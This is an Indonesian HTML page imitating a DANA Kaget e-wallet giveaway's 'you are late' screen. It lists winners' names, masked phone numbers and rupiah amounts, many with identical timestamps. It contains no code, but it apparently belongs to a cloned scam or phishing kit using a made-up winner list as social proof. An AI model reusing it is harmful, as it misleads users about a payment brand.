<!DOCTYPE html>
<html>
    <head>
        <title>DANA Kaget buatmu</title>
        <meta charset="UTF-8">
        <meta name="description" content="DANA Kaget Cuma buat kamu yang paling gesit! Sikat sekarang!">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<!--        <link rel="stylesheet" type="text/css" href="./../../../lib/style/kaget.css">-->
        <link rel="stylesheet" type="text/css" href="./../../../lib/style/late.css">
    </head>
    <body>
        <div class="container">
            <div class="head">
                <a class="aback" href="/"><img class="back" src="./../../../assets/img/back.png"></a>
                <h2 class="late">Kamu terlambat!</h2>
            </div>
            <dic class="winner">
                <img src="./../../../assets/img/end.jpg" class="banner_end">
                <div class="win">PEMENANG</div>

                <div class="profil">
                    <p class="name">AHMAD SOPIANDI</p>
                    <p class="dte">10 Feb 2023 - 21:43</p>
                    <p class="rp">Rp400.156</p>
                    <img class="null"
                        src="./../../../assets/img/pict/1.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">ENUNG</p>
                    <p class="dte">11 Feb 2023 - 17:43</p>
                    <p class="rp">Rp84.173</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/2.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">RIFKI RAMADHAN</p>
                    <p class="dte">11 Feb 2023 - 20:17</p>
                    <p class="rp">Rp69.023</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">081*****4726</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp28.201</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/3.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">RIMA MEUTIA</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp10.000</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">CHAERUL MELINDA</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp38.220</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/4.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">RENA ALFHARIZQI</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp108.721</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/5.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">089****8173</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp75.028</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">085*****8172</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp29.627</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">ZELAYA PRADIPTA</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp10.093</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">RIZQI RIFAI</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp17.103</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">SAKURA MEGANTARA</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp73.927</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">081*****8277</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp38.383</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>

                <div class="profil">
                    <p class="name">RISMA AULIA</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp76.173</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/6.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">SAFITRI</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp9.173</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="profil">
                    <p class="name">FATHUS SALIM</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp9.173</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/7.jpg"
                    >
                </div>
                <div class="profil">
                    <p class="name">088*****7927</p>
                    <p class="dte">11 Feb 2023 - 20:43</p>
                    <p class="rp">Rp9.173</p>
                    <img class="null" 
                        src="./../../../assets/img/pict/0.png"
                    >
                </div>
                <div class="buton">
                    <a href="/">
                        <button>TUTUP</button>
                    </a>
                </div> <!--button close-->
            </div>
        </div>
    </body>
</html>
